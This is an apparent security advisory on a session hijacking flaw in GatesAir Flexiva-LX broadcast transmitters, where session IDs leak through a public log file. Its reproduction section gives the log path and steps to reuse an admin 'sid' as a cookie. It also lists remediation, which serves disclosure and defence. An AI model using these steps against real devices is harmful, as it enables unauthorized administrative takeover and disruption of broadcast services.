GatesAir Flexiva-LX Series Session Hijacking Vulnerability

A session hijacking vulnerability has been identified in GatesAir Flexiva-LX devices running firmware versions 1.0.13 and 2.0. This issue affects models LX100, LX300, LX600, and LX1000. The vulnerability arises because sensitive session identifiers (sid) are exposed in a publicly accessible log file. An unauthenticated attacker can retrieve these session IDs and hijack sessions without needing any credentials. Exploitation requires that the legitimate user (admin) has closed the browser window without logging out.

Impact

Exploitation of this vulnerability allows unauthorized users to gain full administrative access to the device, enabling them to make unauthorized changes to configurations. This could disrupt critical broadcast services.

Reproduction

To reproduce this vulnerability, access the log file at '/log/Flexiva%20LX.log' on the target device. Look for the 'sid' values, which are the session identifiers. After identifying a valid 'sid', copy it and set it as a cookie in your browser. Refresh the main page, and you will be logged in as the admin user. Note that this only works if the admin has closed the browser without logging out.

Remediation

It is recommended to avoid logging session identifiers into log files, restrict access to log endpoints to authenticated users, bind session tokens to the user's IP address and User-Agent, invalidate sessions when the browser is closed or after inactivity, set session cookies with 'Secure', 'HttpOnly', and 'SameSite=Strict' attributes, and regularly encrypt and rotate log files.